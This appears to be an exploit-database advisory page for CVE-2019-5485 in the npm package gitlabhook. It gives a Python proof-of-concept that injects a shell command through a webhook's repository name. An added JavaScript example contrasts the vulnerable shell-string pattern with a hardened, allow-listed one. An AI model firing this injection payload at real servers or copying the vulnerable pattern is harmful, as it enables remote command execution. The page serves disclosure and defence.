Published on September 25th, 2019
NPMJS gitlabhook 0.0.17 – 'repository' Remote Command Execution
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485
#!/usr/bin/python
import requests

# Webhook listener of the vulnerable gitlabhook instance (default port 3420).
target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"

# The repository name lands inside a single-quoted shell argument, so a quote in
# the name closes that argument and the command after the ';' is executed.
payload = '{"repository":{"name": "Diasporrra\'; %s;\'"}}' % cmd

r = requests.post(target, data=payload)
print("Done.")
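As an added illustration of the bug class behind CVE-2019-5485 (constructed for this page, not gitlabhook's own code and not part of the original advisory): a Node handler that splices the webhook's `repository.name` into a shell string, beside a hardened handler that allow-lists the name and passes it as a discrete argv element with no shell. The `./deploy.sh` script, the allowed-name pattern and the sample bodies are assumptions.

```javascript
// Constructed illustration (not gitlabhook's own code) of the injection class
// behind CVE-2019-5485: untrusted "repository.name" reaching a shell string.
const ALLOWED_NAME = /^[A-Za-z0-9._-]{1,100}$/; // assumed policy for repo names

// Vulnerable pattern: the name is spliced into a single-quoted shell string.
// A quote inside the name closes that argument and appends a second command.
function buildShellCommandUnsafe(repoName) {
  return `cd /srv/hooks && ./deploy.sh '${repoName}'`; // hypothetical script
}

// Hardened pattern: reject anything outside the allow-list, then hand the
// name to execFile-style invocation as one argv element so it is never
// re-parsed by a shell. Only the argv is built here; nothing is executed.
function buildArgvSafe(repoName) {
  if (typeof repoName !== 'string' || !ALLOWED_NAME.test(repoName)) {
    throw new Error('rejected repository name');
  }
  return { file: './deploy.sh', args: [repoName] };
}

// Parse a webhook body the way a listener would and decide whether to act.
function handleWebhook(rawBody) {
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch (e) {
    return { ok: false, reason: 'bad json' };
  }
  const name = body && body.repository && body.repository.name;
  try {
    return { ok: true, invoke: buildArgvSafe(name) };
  } catch (e) {
    return { ok: false, reason: e.message };
  }
}

// Constructed sample bodies: a benign push and one shaped like the PoC above.
const BENIGN = '{"repository":{"name":"Diasporrra"}}';
const MALICIOUS = '{"repository":{"name":"Diasporrra\'; touch /tmp/poc.txt;\'"}}';

// The unsafe builder lets the injected command through; the safe path rejects it.
const unsafeCommand = buildShellCommandUnsafe(JSON.parse(MALICIOUS).repository.name);
const safeDecision = handleWebhook(MALICIOUS);
console.log(unsafeCommand);
console.log(JSON.stringify(safeDecision));
```

A webhook receiver can apply the same allow-list at the edge and log rejected names, which is a cheap detection signal for probing of this CVE.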
https://www.exploit-db.com/exploits/47420